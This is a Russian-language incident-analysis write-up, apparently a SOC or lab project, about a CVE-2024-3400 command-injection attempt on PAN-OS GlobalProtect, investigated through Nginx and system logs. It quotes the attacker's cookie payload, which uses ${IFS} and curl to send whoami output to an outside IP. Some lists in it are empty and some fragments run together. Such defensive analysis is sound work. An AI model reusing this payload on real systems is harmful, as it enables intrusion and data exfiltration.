
Расследование попытки инъекции команд CVE-2024-3400 в PAN-OS: анализ доставки полезной нагрузки, внутренней обработки и проверки выполнения на основе журнальных записей.
Этот проект описывает расследование попытки инъекции команд CVE-2024-3400 в службу GlobalProtect PAN-OS.
Цель состояла в том, чтобы определить:
Было сработано критическое оповещение, указывающее на возможную попытку эксплуатации уязвимости.

Запрос содержит специально сформированный cookie:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS} обходит фильтрацию пробеловwhoami пытается получить идентификатор системыcurl пытается установить исходящее соединениеЭто полезная нагрузка для инъекции команд
Журналы Nginx подтверждают, что запрос достиг сервера:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Вредоносный запрос был принят и обработан.
Системные журналы показывают, что полезная нагрузка достигла внутренней логики:

dt_curl)Однако:
Сбой DNS-запроса → исходящее соединение не удалось
Атакующий IP-адрес:

Это подтверждает внешнее происхождение атаки.
До атаки с системой взаимодействовало несколько IP-адресов:

Только 144.172.79.92 напрямую связан с эксплуатацией уязвимости.
Это была реальная попытка инъекции команд.
Атакующий успешно:
Однако:
подтверждённого выполнения команд или компрометации системы нет
Попытка инъекции команд
Полезная нагрузка обработана — подтверждённого выполнения или воздействия нет